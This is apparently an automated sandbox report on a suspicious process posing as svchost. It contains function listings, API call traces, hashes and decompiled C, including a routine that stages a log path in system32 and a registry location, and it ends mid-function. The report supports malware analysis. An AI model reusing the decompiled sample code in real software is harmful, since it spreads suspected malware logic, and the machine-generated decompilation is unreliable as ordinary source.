                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$InfoLocale_abort_free
                                                • String ID:
                                                • API String ID: 2692324296-0
                                                • Opcode ID: 350cfe6c00538ed3f2b650e68ac6f4d25727ed9feda7107c51c3e4f2be88b08e
                                                • Instruction ID: 5941e136b5b863414760e22d6d14c1f177fdd0f66e17cf2d14ec1e4294b9056b
                                                • Opcode Fuzzy Hash: 350cfe6c00538ed3f2b650e68ac6f4d25727ed9feda7107c51c3e4f2be88b08e
                                                • Instruction Fuzzy Hash: 42F0F936A106167BDB24EA2A8C057BA777CEF40394F190669EC46A7140EA30BD41C6D0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 039AFA08 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 039A5EE2: GetLastError.KERNEL32(00000008,039BE9B8,039A9694), ref: 039A5EE6
                                                  • Part of subcall function 039A5EE2: _free.LIBCMT ref: 039A5F19
                                                  • Part of subcall function 039A5EE2: SetLastError.KERNEL32(00000000,039A4866,00000016,039A54EF,?,?,039BE9B8), ref: 039A5F5A
                                                  • Part of subcall function 039A5EE2: _abort.LIBCMT ref: 039A5F60
                                                  • Part of subcall function 039A5EE2: _free.LIBCMT ref: 039A5F41
                                                  • Part of subcall function 039A5EE2: SetLastError.KERNEL32(00000000,039A4866,00000016,039A54EF,?,?,039BE9B8), ref: 039A5F4E
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 039AFA65
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$_free$InfoLocale_abort
                                                • String ID:
                                                • API String ID: 1663032902-0
                                                • Opcode ID: 59170ea99bd1bc33cfcd52e695e8e024740302734d6a22e5e787047480ee8166
                                                • Instruction ID: da839f2907a7d7b63ccbf8f45e517670a9c3d82101f1f542211b7eb118dd3206
                                                • Opcode Fuzzy Hash: 59170ea99bd1bc33cfcd52e695e8e024740302734d6a22e5e787047480ee8166
                                                • Instruction Fuzzy Hash: EF012632B25204EBDB14EF78DD45AFA33A8EF45310F1082BAED02DF240EA755C008790
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 039AF5A5 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 039A5EE2: GetLastError.KERNEL32(00000008,039BE9B8,039A9694), ref: 039A5EE6
                                                  • Part of subcall function 039A5EE2: _free.LIBCMT ref: 039A5F19
                                                  • Part of subcall function 039A5EE2: SetLastError.KERNEL32(00000000,039A4866,00000016,039A54EF,?,?,039BE9B8), ref: 039A5F5A
                                                  • Part of subcall function 039A5EE2: _abort.LIBCMT ref: 039A5F60
                                                  • Part of subcall function 039A5EE2: _free.LIBCMT ref: 039A5F41
                                                  • Part of subcall function 039A5EE2: SetLastError.KERNEL32(00000000,039A4866,00000016,039A54EF,?,?,039BE9B8), ref: 039A5F4E
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,039A720A,00000000,039A732A), ref: 039AF5F9
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$_free$InfoLocale_abort
                                                • String ID:
                                                • API String ID: 1663032902-0
                                                • Opcode ID: 594e6db0145044864ae4be3225170cc036a4f4ea781a1b1e9cbbc8878ae4e851
                                                • Instruction ID: 99178163dddfae1443515eaecaed07de6242d7b42353f5acadbab482c035f3b0
                                                • Opcode Fuzzy Hash: 594e6db0145044864ae4be3225170cc036a4f4ea781a1b1e9cbbc8878ae4e851
                                                • Instruction Fuzzy Hash: 6CF02836B11209BBD714FFB8DC45DBA73ACDF85310F1542BAE902DB240EA34AD058790
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 039AF734 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 039A5EE2: GetLastError.KERNEL32(00000008,039BE9B8,039A9694), ref: 039A5EE6
                                                  • Part of subcall function 039A5EE2: _free.LIBCMT ref: 039A5F19
                                                  • Part of subcall function 039A5EE2: SetLastError.KERNEL32(00000000,039A4866,00000016,039A54EF,?,?,039BE9B8), ref: 039A5F5A
                                                  • Part of subcall function 039A5EE2: _abort.LIBCMT ref: 039A5F60
                                                • EnumSystemLocalesW.KERNEL32(039AFA11,00000001,?,?,039A7203,?,039AFDB2,039A7203,?,?,?,?,?,039A7203,?,?), ref: 039AF780
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                • String ID:
                                                • API String ID: 1084509184-0
                                                • Opcode ID: 600a5dd4b1aab26b05ba30bec26b1e36588cc6af339ec5c2ed39c81333b1dc98
                                                • Instruction ID: 97b33f951428aeaf6dfec78903e87de53cb1a2dacbae8bbdc36d090981ee5afb
                                                • Opcode Fuzzy Hash: 600a5dd4b1aab26b05ba30bec26b1e36588cc6af339ec5c2ed39c81333b1dc98
                                                • Instruction Fuzzy Hash: A5F0C8363007055FD714DF3D9C80A7A7BD9FF80769B19456CE9468B540E6719802C680
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 039A4DF0 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 039A3068: RtlEnterCriticalSection.NTDLL(-00030ACA), ref: 039A3077
                                                • EnumSystemLocalesW.KERNEL32(039A4DAA,00000001,039BEEA8,0000000C), ref: 039A4E28
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                                • String ID:
                                                • API String ID: 1272433827-0
                                                • Opcode ID: 793974e0c5d6d7b751ac3b14527fd1164553861ba2a7b929e6edaed0b4a95e7c
                                                • Instruction ID: 986ede9a85061335af183f9727c690eba690b28166b9e090b099abca6efc1f4d
                                                • Opcode Fuzzy Hash: 793974e0c5d6d7b751ac3b14527fd1164553861ba2a7b929e6edaed0b4a95e7c
                                                • Instruction Fuzzy Hash: F7F03737A24704EFEB00EF6CE445B8E77A0AB95720F21821AE410DF295CBB48981DB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 039AF64E Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 039A5EE2: GetLastError.KERNEL32(00000008,039BE9B8,039A9694), ref: 039A5EE6
                                                  • Part of subcall function 039A5EE2: _free.LIBCMT ref: 039A5F19
                                                  • Part of subcall function 039A5EE2: SetLastError.KERNEL32(00000000,039A4866,00000016,039A54EF,?,?,039BE9B8), ref: 039A5F5A
                                                  • Part of subcall function 039A5EE2: _abort.LIBCMT ref: 039A5F60
                                                • EnumSystemLocalesW.KERNEL32(039AF5A5,00000001,?,?,?,039AFE10,039A7203,?,?,?,?,?,039A7203,?,?,?), ref: 039AF685
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                • String ID:
                                                • API String ID: 1084509184-0
                                                • Opcode ID: 9975e5324b69dab953f4b2a39e7a7fd53dd0c99350f67068b7f2982b53e59f09
                                                • Instruction ID: a0fa2e208afdefb57f5f051347f5b523841f12fa58099f079ea6f890fc79b86e
                                                • Opcode Fuzzy Hash: 9975e5324b69dab953f4b2a39e7a7fd53dd0c99350f67068b7f2982b53e59f09
                                                • Instruction Fuzzy Hash: D0F0553A3003096BCB04EF3ADC44A7A7F98FFC1754B0B4098EA068F250CA31D842C790
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 6FD54430 Relevance: 31.8, APIs: 16, Strings: 2, Instructions: 318memoryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 95%
                                                			E6FD54430(void* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				char _v16;
				void* _v20;
				void* _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				struct _CRITICAL_SECTION _v60;
				char _v64;
				void* __edi;
				void* __esi;
				signed int _t94;
				intOrPtr* _t104;
				signed int _t105;
				long _t106;
				intOrPtr* _t116;
				signed int _t117;
				long _t118;
				intOrPtr* _t123;
				signed int _t125;
				long _t126;
				intOrPtr* _t131;
				signed int _t133;
				long _t134;
				intOrPtr* _t139;
				signed int _t140;
				long _t141;
				void* _t143;
				signed int _t152;
				signed int _t154;
				void* _t161;
				void* _t164;
				intOrPtr _t165;
				void* _t166;
				intOrPtr* _t171;
				signed int _t172;
				signed int _t173;
				signed int _t174;
				void* _t180;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				void* _t185;
				intOrPtr* _t186;
				intOrPtr* _t187;
				intOrPtr* _t188;
				intOrPtr* _t189;
				intOrPtr* _t190;
				intOrPtr* _t194;
				intOrPtr* _t196;
				intOrPtr* _t197;
				void* _t198;
				intOrPtr* _t199;
				void* _t200;
				intOrPtr* _t201;
				void* _t202;
				intOrPtr* _t203;
				void* _t204;
				signed int _t206;
				signed int _t207;
				void* _t208;
				void* _t211;
				void* _t212;
				void* _t216;
				void* _t218;
				void* _t220;
				void* _t222;

				_push(0xffffffff);
				_push(E6FD605D8);
				_push( *[fs:0x0]);
				_t94 =  *0x6fd68008; // 0xc92c5105
				_push(_t94 ^ _t207);
				 *[fs:0x0] =  &_v16;
				_t185 = __edx;
				_t161 = __ecx;
				_t2 = _t185 + 1; // 0x1
				_t193 = _t2;
				_v24 = LocalAlloc(0x40, _t2);
				E6FD57920(_t185, LocalAlloc, 0, _t193);
				_t162 = _v24;
				E6FD5FDE0(_v24, _t161, _t185);
				_v64 = 0x6fd65f50;
				InitializeCriticalSection( &_v60);
				_v36 = 0;
				_v32 = 0;
				_v28 = 0;
				_v8 = 0;
				E6FD541E0(_t162, _t185,  &_v64);
				_t211 = _t208 - 0x30 + 0x1c;
				if(_v32 >= 3) {
					EnterCriticalSection(0x6fd6ac54);
					_t104 = E6FD559AF(_t193, __eflags, 0xc);
					_t194 = 0x6fd6b720;
					_t186 = _t104;
					_t212 = _t211 + 4;
					_v20 = _t186;
					do {
						_t105 =  *_t194;
						_t194 = _t194 + 1;
						__eflags = _t105;
					} while (_t105 != 0);
					_t195 = _t194 - 0x6fd6b721;
					 *_t186 = 7;
					_t106 = _t194 - 0x6fd6b721 + 1;
					 *(_t186 + 4) = _t106;
					 *((intOrPtr*)(_t186 + 8)) = LocalAlloc(0x40, _t106);
					E6FD57920(_t186, _t107, 0,  *(_t186 + 4));
					E6FD5FDE0( *((intOrPtr*)(_t186 + 8)), "C:\Windows\system32\msvcwme.log", _t195);
					E6FD54AE0(0x6fd6b721, _t186);
					_t196 = E6FD559AF(_t195, __eflags, 0xc);
					_v20 = _t196;
					 *_t196 = 8;
					 *(_t196 + 4) = 0x46;
					 *((intOrPtr*)(_t196 + 8)) = LocalAlloc(0x40, 0x46);
					E6FD57920(_t186, _t112, 0,  *(_t196 + 4));
					E6FD5FDE0( *((intOrPtr*)(_t196 + 8)), "Software\\Microsoft\\Windows NT\\CurrentVersion\\NetworkPlatform\\Location", 0x45);
					E6FD54AE0(0x6fd6b721, _t196);
					_t116 = E6FD559AF(_t196, __eflags, 0xc);
					_t171 = _v36;
					_t197 = 0;
					_t216 = _t212 + 0x38;
					_t187 = _t116;
					_v20 = _t187;
					__eflags = _v32;
					if(_v32 > 0) {
						_t197 =  *_t171;
					}
					_t28 = _t197 + 1; // 0x1
					_t180 = _t28;
					do {
						_t117 =  *_t197;
						_t197 = _t197 + 1;
						__eflags = _t117;
					} while (_t117 != 0);
					_t198 = _t197 - _t180;
					_v20 = 0;
					__eflags = _v32;
					if(_v32 > 0) {
						_v20 =  *_t171;
					}
					_t32 = _t198 + 1; // 0x2
					_t118 = _t32;
					 *_t187 = 0xb;
					 *(_t187 + 4) = _t118;
					 *((intOrPtr*)(_t187 + 8)) = LocalAlloc(0x40, _t118);
					E6FD57920(_t187, _t119, 0,  *(_t187 + 4));
					E6FD5FDE0( *((intOrPtr*)(_t187 + 8)), _v20, _t198);
					E6FD54AE0(_t171, _t187);
					_t123 = E6FD559AF(_t198, __eflags, 0xc);
					_t181 = _v32;
					_t218 = _t216 + 0x1c;
					_t172 = _v36;
					_t188 = _t123;
					_t199 = 0;
					_v20 = _t188;
					__eflags = _t181 - 1;
					if(_t181 > 1) {
						_t199 =  *((intOrPtr*)(_t172 + 4));
					}
					_t42 = _t199 + 1; // 0x1
					_v20 = _t42;
					do {
						_t125 =  *_t199;
						_t199 = _t199 + 1;
						__eflags = _t125;
					} while (_t125 != 0);
					_t200 = _t199 - _v20;
					_v20 = 0;
					__eflags = _t181 - 1;
					if(_t181 > 1) {
						_v20 =  *((intOrPtr*)(_t172 + 4));
					}
					_t48 = _t200 + 1; // 0x1
					_t126 = _t48;
					 *_t188 = 9;
					 *(_t188 + 4) = _t126;
					 *((intOrPtr*)(_t188 + 8)) = LocalAlloc(0x40, _t126);
					E6FD57920(_t188, _t127, 0,  *(_t188 + 4));
					E6FD5FDE0( *((intOrPtr*)(_t188 + 8)), _v20, _t200);
					E6FD54AE0(_t172, _t188);
					_t131 = E6FD559AF(_t200, __eflags, 0xc);
					_t182 = _v32;
					_t220 = _t218 + 0x1c;
					_t173 = _v36;
					_t189 = _t131;
					_t201 = 0;
					_v20 = _t189;
					__eflags = _t182 - 2;
					if(_t182 > 2) {
						_t201 =  *((intOrPtr*)(_t173 + 8));
					}
					_t58 = _t201 + 1; // 0x1
					_v20 = _t58;
					do {
						_t133 =  *_t201;
						_t201 = _t201 + 1;
						__eflags = _t133;
					} while (_t133 != 0);
					_t202 = _t201 - _v20;
					_v20 = 0;
					__eflags = _t182 - 2;
					if(_t182 > 2) {
						_v20 =  *((intOrPtr*)(_t173 + 8));
					}
					_t64 = _t202 + 1; // 0x1
					_t134 = _t64;
					 *_t189 = 0xa;
					 *(_t189 + 4) = _t134;
					 *((intOrPtr*)(_t189 + 8)) = LocalAlloc(0x40, _t134);
					E6FD57920(_t189, _t135, 0,  *(_t189 + 4));
					E6FD5FDE0( *((intOrPtr*)(_t189 + 8)), _v20, _t202);
					E6FD54AE0(_t173, _t189);
					_t139 = E6FD559AF(_t202, __eflags, 0xc);
					_t183 = _v32;
					_t222 = _t220 + 0x1c;
					_t174 = _v36;
					_t190 = _t139;
					_t203 = 0;
					_v20 = _t190;
					__eflags = _t183 - 3;
					if(_t183 > 3) {
						_t203 =  *((intOrPtr*)(_t174 + 0xc));
					}
					_t74 = _t203 + 1; // 0x1
					_t164 = _t74;
					do {
						_t140 =  *_t203;
						_t203 = _t203 + 1;
						__eflags = _t140;
					} while (_t140 != 0);
					_t204 = _t203 - _t164;
					_t165 = 0;
					__eflags = _t183 - 3;
					if(_t183 > 3) {
						_t165 =  *((intOrPtr*)(_t174 + 0xc));
					}
					_t76 = _t204 + 1; // 0x2
					_t141 = _t76;
					 *_t190 = 0xc;
					 *(_t190 + 4) = _t141;
					_t143 = LocalAlloc(0x40, _t141);
					 *((intOrPtr*)(_t190 + 8)) = LocalAlloc;
					E6FD57920(_t190, _t143, 0,  *(_t190 + 4));
					E6FD5FDE0( *((intOrPtr*)(_t190 + 8)), _t165, _t204);
					_t211 = _t222 + 0x18;
					E6FD54AE0(_t174, _t190);
					LeaveCriticalSection(0x6fd6ac54);
					__eflags = _v28 - 0x14;
					_v32 = 0;
					if(_v28 >= 0x14) {
						_t206 = _v36;
						_push(0x28);
						_t152 = E6FD58E7B(_t174);
						_t211 = _t211 + 4;
						_v36 = _t152;
						__eflags = _t152;
						if(_t152 != 0) {
							__eflags = _t206;
							if(_t206 != 0) {
								_t178 = _v32 << 2;
								__eflags = _v32 << 2;
								E6FD5FDE0(_t152, _t206, _t178);
								L6FD58E76(_t206);
								_t211 = _t211 + 0x10;
							}
							_t154 = _v32 + 0xa;
							__eflags = _t154;
							_v28 = _t154;
						}
					}
					LocalFree(_v24);
					_t166 = 1;
					L34:
					_v64 = 0x6fd65f50;
					DeleteCriticalSection( &_v60);
					_t149 = _v36;
					if(_v36 != 0) {
						L6FD58E76(_t149);
					}
					 *[fs:0x0] = _v16;
					return _t166;
				}
				_t166 = 0;
				goto L34;
			}






































































                                                0x6fd54433
                                                0x6fd54435
                                                0x6fd54440
                                                0x6fd54447
                                                0x6fd5444e
                                                0x6fd54452
                                                0x6fd54458
                                                0x6fd5445a
                                                0x6fd54461
                                                0x6fd54461
                                                0x6fd5446d
                                                0x6fd54470
                                                0x6fd54477
                                                0x6fd5447b
                                                0x6fd54483
                                                0x6fd5448e
                                                0x6fd54494
                                                0x6fd5449b
                                                0x6fd544a2
                                                0x6fd544ac
                                                0x6fd544b6
                                                0x6fd544bb
                                                0x6fd544c2
                                                0x6fd544d0
                                                0x6fd544d8
                                                0x6fd544dd
                                                0x6fd544e2
                                                0x6fd544e4
                                                0x6fd544e7
                                                0x6fd544f0
                                                0x6fd544f0
                                                0x6fd544f2
                                                0x6fd544f3
                                                0x6fd544f3
                                                0x6fd544fd
                                                0x6fd544ff
                                                0x6fd54505
                                                0x6fd5450b
                                                0x6fd54513
                                                0x6fd54519
                                                0x6fd54527
                                                0x6fd54530
                                                0x6fd5453f
                                                0x6fd54541
                                                0x6fd54548
                                                0x6fd5454e
                                                0x6fd5455a
                                                0x6fd54560
                                                0x6fd5456f
                                                0x6fd54578
                                                0x6fd5457f
                                                0x6fd54584
                                                0x6fd54587
                                                0x6fd54589
                                                0x6fd5458c
                                                0x6fd5458e
                                                0x6fd54591
                                                0x6fd54594
                                                0x6fd54596
                                                0x6fd54596
                                                0x6fd54598
                                                0x6fd54598
                                                0x6fd545a0
                                                0x6fd545a0
                                                0x6fd545a2
                                                0x6fd545a3
                                                0x6fd545a3
                                                0x6fd545a7
                                                0x6fd545a9
                                                0x6fd545b0
                                                0x6fd545b4
                                                0x6fd545b8
                                                0x6fd545b8
                                                0x6fd545bb
                                                0x6fd545bb
                                                0x6fd545be
                                                0x6fd545c7
                                                0x6fd545cf
                                                0x6fd545d5
                                                0x6fd545e1
                                                0x6fd545ea
                                                0x6fd545f1
                                                0x6fd545f6
                                                0x6fd545f9
                                                0x6fd545fc
                                                0x6fd545ff
                                                0x6fd54601
                                                0x6fd54603
                                                0x6fd54606
                                                0x6fd54609
                                                0x6fd5460b
                                                0x6fd5460b
                                                0x6fd5460e
                                                0x6fd54611
                                                0x6fd54614
                                                0x6fd54614
                                                0x6fd54616
                                                0x6fd54617
                                                0x6fd54617
                                                0x6fd5461b
                                                0x6fd5461e
                                                0x6fd54625
                                                0x6fd54628
                                                0x6fd5462d
                                                0x6fd5462d
                                                0x6fd54630
                                                0x6fd54630
                                                0x6fd54633
                                                0x6fd5463c
                                                0x6fd54644
                                                0x6fd5464a
                                                0x6fd54656
                                                0x6fd5465f
                                                0x6fd54666
                                                0x6fd5466b
                                                0x6fd5466e
                                                0x6fd54671
                                                0x6fd54674
                                                0x6fd54676
                                                0x6fd54678
                                                0x6fd5467b
                                                0x6fd5467e
                                                0x6fd54680
                                                0x6fd54680
                                                0x6fd54683
                                                0x6fd54686
                                                0x6fd54690
                                                0x6fd54690
                                                0x6fd54692
                                                0x6fd54693
                                                0x6fd54693
                                                0x6fd54697
                                                0x6fd5469a
                                                0x6fd546a1
                                                0x6fd546a4
                                                0x6fd546a9
                                                0x6fd546a9
                                                0x6fd546ac
                                                0x6fd546ac
                                                0x6fd546af
                                                0x6fd546b8
                                                0x6fd546c0
                                                0x6fd546c6
                                                0x6fd546d2
                                                0x6fd546db
                                                0x6fd546e2
                                                0x6fd546e7
                                                0x6fd546ea
                                                0x6fd546ed
                                                0x6fd546f0
                                                0x6fd546f2
                                                0x6fd546f4
                                                0x6fd546f7
                                                0x6fd546fa
                                                0x6fd546fc
                                                0x6fd546fc
                                                0x6fd546ff
                                                0x6fd546ff
                                                0x6fd54702
                                                0x6fd54702
                                                0x6fd54704
                                                0x6fd54705
                                                0x6fd54705
                                                0x6fd54709
                                                0x6fd5470b
                                                0x6fd5470d
                                                0x6fd54710
                                                0x6fd54712
                                                0x6fd54712
                                                0x6fd54715
                                                0x6fd54715
                                                0x6fd54718
                                                0x6fd5471f
                                                0x6fd54729
                                                0x6fd5472e
                                                0x6fd54734
                                                0x6fd5473e
                                                0x6fd54743
                                                0x6fd54747
                                                0x6fd54751
                                                0x6fd54757
                                                0x6fd5475b
                                                0x6fd54762
                                                0x6fd54764
                                                0x6fd54767
                                                0x6fd54769
                                                0x6fd5476e
                                                0x6fd54771
                                                0x6fd54774
                                                0x6fd54776
                                                0x6fd54778
                                                0x6fd5477a
                                                0x6fd5477f
                                                0x6fd5477f
                                                0x6fd54785
                                                0x6fd5478b
                                                0x6fd54790
                                                0x6fd54790
                                                0x6fd54796
                                                0x6fd54796
                                                0x6fd54799
                                                0x6fd54799
                                                0x6fd54776
                                                0x6fd5479f
                                                0x6fd547a5
                                                0x6fd547a7
                                                0x6fd547aa
                                                0x6fd547b2
                                                0x6fd547b8
                                                0x6fd547bd
                                                0x6fd547c0
                                                0x6fd547c5
                                                0x6fd547cd
                                                0x6fd547db
                                                0x6fd547db
                                                0x6fd544c4
                                                0x00000000

                                                APIs
                                                • InitializeCriticalSection.KERNEL32(?), ref: 6FD5448E
                                                • EnterCriticalSection.KERNEL32(6FD6AC54), ref: 6FD544D0
                                                • new.LIBCMT ref: 6FD544D8
                                                • LocalAlloc.KERNEL32(00000040,?), ref: 6FD5450E
                                                • new.LIBCMT ref: 6FD54537
                                                • LocalAlloc.KERNEL32(00000040,00000046,00000000), ref: 6FD54555
                                                • new.LIBCMT ref: 6FD5457F
                                                • LocalAlloc.KERNEL32(00000040,00000002,00000000), ref: 6FD545CA
                                                • new.LIBCMT ref: 6FD545F1
                                                • DeleteCriticalSection.KERNEL32(?), ref: 6FD547B2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: AllocCriticalLocalSection$DeleteEnterInitialize
                                                • String ID: C:\Windows\system32\msvcwme.log$Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location
                                                • API String ID: 53876381-3836515607
                                                • Opcode ID: d07620e8e10011f81d70230bd5449a03aee8ec0c4a33a0a48817592b916af4d8
                                                • Instruction ID: 5566c3b1d006d7b4b8012db9476d6516ec264bdd1a1d08a3ab8833c1a2663481
                                                • Opcode Fuzzy Hash: d07620e8e10011f81d70230bd5449a03aee8ec0c4a33a0a48817592b916af4d8
                                                • Instruction Fuzzy Hash: 46C19EB5C00316AFDF508FA4CC54BAEBBB5FF06308F108519E919A7281D776B825CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 6FD56AA8 Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 270COMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 58%
                                                			E6FD56AA8(signed int* __ecx, signed int __edx, intOrPtr* _a4, intOrPtr _a8, signed int* _a12, intOrPtr _a16, signed int* _a20, char _a24, intOrPtr _a28, signed int _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				char _v5;
				char _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				char _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				char _v72;
				intOrPtr* _v80;
				signed int _v100;
				signed int* _v144;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t190;
				signed int* _t198;
				intOrPtr* _t199;
				signed int _t202;
				signed int _t206;
				intOrPtr* _t210;
				signed int _t211;
				signed int _t212;
				signed int _t214;
				signed int _t215;
				signed int _t217;
				signed int _t221;
				void* _t225;
				signed int _t227;
				void* _t231;
				void* _t233;
				char _t234;
				signed int* _t236;
				signed int _t237;
				signed int _t238;
				signed int _t240;
				signed int _t244;
				void* _t246;
				void* _t248;
				void* _t251;
				intOrPtr _t253;
				intOrPtr _t254;
				void* _t256;
				char _t257;
				signed int _t263;
				char* _t267;
				intOrPtr _t273;
				signed int _t278;
				signed int _t279;
				signed int _t282;
				char _t283;
				intOrPtr _t285;
				signed int _t287;
				signed int* _t289;
				intOrPtr* _t290;
				signed int* _t292;
				signed int _t294;
				intOrPtr _t300;
				intOrPtr* _t304;
				signed int _t305;
				void* _t306;
				signed int* _t310;
				void* _t313;
				void* _t314;
				void* _t316;
				void* _t317;
				void* _t318;
				void* _t319;

				_t282 = __edx;
				_t264 = __ecx;
				_t253 = _a8;
				_push(_t304);
				_t289 = _a20;
				_v44 = 0;
				_v5 = 0;
				if(_t289[1] > 0x80) {
					_t190 =  *((intOrPtr*)(_t253 + 8));
				} else {
					_t190 =  *((char*)(_t253 + 8));
				}
				_v12 = _t190;
				if(_t190 < 0xffffffff || _t190 >= _t289[1]) {
					L62:
					E6FD59ED0(_t253, _t264, _t282, _t289, _t304, __eflags);
					goto L63;
				} else {
					_t304 = _a4;
					if( *_t304 != 0xe06d7363) {
						_t264 = _a12;
						goto L57;
					} else {
						if( *((intOrPtr*)(_t304 + 0x10)) != 3 ||  *((intOrPtr*)(_t304 + 0x14)) != 0x19930520 &&  *((intOrPtr*)(_t304 + 0x14)) != 0x19930521 &&  *((intOrPtr*)(_t304 + 0x14)) != 0x19930522) {
							L23:
							_t264 = _a12;
							_v16 = _t264;
							goto L25;
						} else {
							_t328 =  *((intOrPtr*)(_t304 + 0x1c));
							if( *((intOrPtr*)(_t304 + 0x1c)) != 0) {
								goto L23;
							} else {
								_t225 = E6FD580E6(_t253, _t264, _t282, _t289, _t304, _t328);
								_t329 =  *((intOrPtr*)(_t225 + 0x10));
								if( *((intOrPtr*)(_t225 + 0x10)) == 0) {
									L61:
									return _t225;
								} else {
									_t304 =  *((intOrPtr*)(E6FD580E6(_t253, _t264, _t282, _t289, _t304, _t329) + 0x10));
									_t246 = E6FD580E6(_t253, _t264, _t282, _t289, _t304, _t329);
									_v44 = 1;
									_v16 =  *((intOrPtr*)(_t246 + 0x14));
									if(_t304 == 0) {
										goto L62;
									} else {
										if( *_t304 != 0xe06d7363 ||  *((intOrPtr*)(_t304 + 0x10)) != 3 ||  *((intOrPtr*)(_t304 + 0x14)) != 0x19930520 &&  *((intOrPtr*)(_t304 + 0x14)) != 0x19930521 &&  *((intOrPtr*)(_t304 + 0x14)) != 0x19930522) {
											L19:
											_t248 = E6FD580E6(_t253, _t264, _t282, _t289, _t304, _t336);
											_t337 =  *((intOrPtr*)(_t248 + 0x1c));
											if( *((intOrPtr*)(_t248 + 0x1c)) == 0) {
												L24:
												_t264 = _v16;
												_t190 = _v12;
												L25:
												__eflags =  *_t304 - 0xe06d7363;
												if( *_t304 != 0xe06d7363) {
													L57:
													__eflags = _t289[3];
													if(__eflags <= 0) {
														goto L60;
													} else {
														__eflags = _a24;
														if(__eflags != 0) {
															goto L62;
														} else {
															_push(_a32);
															_push(_a28);
															_push(_t190);
															_push(_t289);
															_push(_a16);
															_push(_t264);
															_push(_t253);
															_push(_t304);
															L66();
															_t316 = _t316 + 0x20;
															goto L60;
														}
													}
												} else {
													__eflags =  *((intOrPtr*)(_t304 + 0x10)) - 3;
													if( *((intOrPtr*)(_t304 + 0x10)) != 3) {
														goto L57;
													} else {
														__eflags =  *((intOrPtr*)(_t304 + 0x14)) - 0x19930520;
														if( *((intOrPtr*)(_t304 + 0x14)) == 0x19930520) {
															L30:
															__eflags = _t289[3];
															if(_t289[3] > 0) {
																_t264 =  &_v28;
																_t233 = E6FD58349( &_v28, _t289, _a28, _t190,  &_v28,  &_v48);
																_t282 = _v28;
																_t316 = _t316 + 0x14;
																__eflags = _t282 - _v48;
																if(_t282 < _v48) {
																	_t47 = _t233 + 0x10; // 0x10
																	_t278 = _t47;
																	_t234 = _v12;
																	_v36 = _t278;
																	do {
